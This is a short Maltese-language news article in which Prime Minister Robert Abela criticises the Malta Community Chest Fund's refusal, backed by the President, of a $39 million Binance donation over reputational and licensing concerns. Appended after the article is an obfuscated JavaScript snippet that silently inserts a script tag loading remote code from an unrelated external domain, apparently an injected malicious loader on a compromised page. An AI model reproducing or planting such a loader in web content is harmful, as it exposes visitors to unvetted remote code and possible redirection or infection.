Lokali

Robert Abela jikkritika d-deċiżjoni tal-President li ma taċċettax donazzjoni tal-Binance

Il-Prim Ministru Robert Abela, talab biex il-Malta Community Chest Fund terġa’ ‘tikkunsidra d-deċiżjoni tagħha li ma taċċettax id-donazzjoni mingħand Binance. Din id-donazzjoni kellha valur ta’ $39 miljun. Dan hekk kif qal li l-MCCF kienet qed tkun stretta żżejjed, u li l-pajjiż seta; għamel użu minn dawn il-fondi.

F’kummenti lill-ġurnlisti huwa ammetta li ma segwiex eżattament din il-kwistjoni, anzi kien infurmat biss b’din is-sitwazzjoni mill-ġurnal tat-Times of Malta.

Minn naħa tagħha l-President ta’ Malta, Myriam Spiteri Debono, qalet li l-MCCF, ma setgħetx taċċetta din id-donzzjoni minħabba tħassib dwar ir-reputazzjoni tagħhom.

Hija qalet li matul din is-sena, kien hemm diversi mistoqsijiet jekk dawn id-donazzjonijiet hux qed isiru ġenwinament għal għan nobbli jew le.

Il-President ta’ Malta wriet tħassib ukoll dwar jekk ‘Binance’ kinetx irċeviet il-permessi kollha mill-awtoritajiet finanzjarji ta’ Malta. Il-kumpanija Binance kienet kumpanija li introduċa l-Minisru Silvio Schembri.

;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);